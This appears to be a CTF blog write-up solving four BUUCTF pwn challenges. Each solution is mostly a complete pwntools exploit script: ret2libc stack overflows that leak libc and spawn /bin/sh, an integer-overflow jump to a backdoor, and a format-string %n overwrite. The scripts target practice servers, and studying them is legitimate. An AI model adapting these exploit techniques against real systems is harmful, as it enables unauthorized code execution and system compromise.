buuctf pwn （21~24）

Triathlon (Fifth Division)_2018_rop

32-bit elf file, look at the logic


stack overflow, there is no system function, no /bin/sh string
and then look at the protection

, it is probably a retlibc problem, the script is as follows:

from pwn import *
from LibcSearcher import *
context(os = "linux", arch = "i386")
context.log_level = 'debug'
p=remote("node4.buuoj.cn",29721)
elf=ELF("./pwn21")
ret=0x08048199
main=0x80484C6

read_got=elf.got['read']
write_plt=elf.plt['write']

payload=b'a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(read_got)+p32(4)
p.sendline(payload)
read_addr=u32(p.recv(4))
print(hex(read_addr))

libc = LibcSearcher('read',read_addr)#进行搜寻
libc_base = read_addr - libc.dump('read')#开始计算地址
system = libc.dump('system')+libc_base
bin_sh = libc.dump('str_bin_sh')+libc_base

payload=b'a'*(0x88+4)+p32(system)+p32(0)+p32(bin_sh)
p.sendline(payload)

p.interactive()

bjdctf_2020_babyrop

64-bit elf file, look at the program logic

stack overflow, there is no system function and /bin/sh string
Look at the protection again

, it should be the retlibc64-bit problem.
The script is as follows:

from pwn import *
from LibcSearcher import *
context(os = 'linux',arch = 'amd64',log_level = 'debug')
p=remote("node4.buuoj.cn",29360)

elf=ELF("./pwn22")
puts_plt=elf.plt['puts']
read_got=elf.got['read']
main=0x4006AD
pop=0x0000000000400733 #pop rdi ret
ret=0x00000000004004c9


p.recvuntil("Pull up your sword and tell me u story!\n")
payload=b'a'*(0x20+8)+p64(pop)+p64(read_got)+p64(puts_plt)+p64(main)
p.sendline(payload)

read_addr=u64(p.recv(6).ljust(8,b'\x00'))
print(hex(read_addr))
libc = LibcSearcher('read',read_addr)#进行搜寻
libc_base = read_addr - libc.dump('read')#开始计算地址
system = libc.dump('system')+libc_base
bin_sh = libc.dump('str_bin_sh')+libc_base


p.recvuntil("Pull up your sword and tell me u story!\n")
payload=b'a'*(0x20+8)+p64(pop)+p64(bin_sh)+p64(ret)+p64(system)
p.sendline(payload)

p.interactive()

If there is a timeout, change the libc version, and you can find it after a few more tries

bjdctf_2020_babystack2

64-bit elf file, after looking at the program logic

analysis, I found that this if judgment does not allow us to enter a number greater than 10, then this will directly use integer overflow. I
wrote about it before, take a look, below this article

The backdoor function is given:

The script is as follows:

from pwn import *
context(os = 'linux',arch = 'amd64',log_level = 'debug')
p=remote("node4.buuoj.cn",28233)
sys=0x400726
p.recvuntil("[+]Please input the length of your name:\n")
p.sendline(str('-1'))
payload=b'a'*(0x10+8)+p64(sys)
p.sendline(payload)
p.interactive()

jarvisoj_fm

32-bit elf file, look at the program logic again.


This is a format string vulnerability. Through this vulnerability, x can be overwritten to 4.
This fmtstr_payload can be used or not. First, look at the offset

number, the offset It is 11
without the fmtstr_payload script as follows:

from pwn import *
context(os = "linux", arch = "i386")
context.log_level = 'debug'
#p=process("./pwn24")
p=remote("node4.buuoj.cn",26446)
payload=p32(0x804A02C)+b'%11$n'
p.sendline(payload)
p.interactive()

The script used is as follows:

from pwn import *
context(os = "linux", arch = "i386")
context.log_level = 'debug'
#p=process("./pwn24")
p=remote("node4.buuoj.cn",26446)
payload=fmtstr_payload(11,{
    
    0x0804A02C:4})
p.sendline(payload)
p.interactive()

Can get through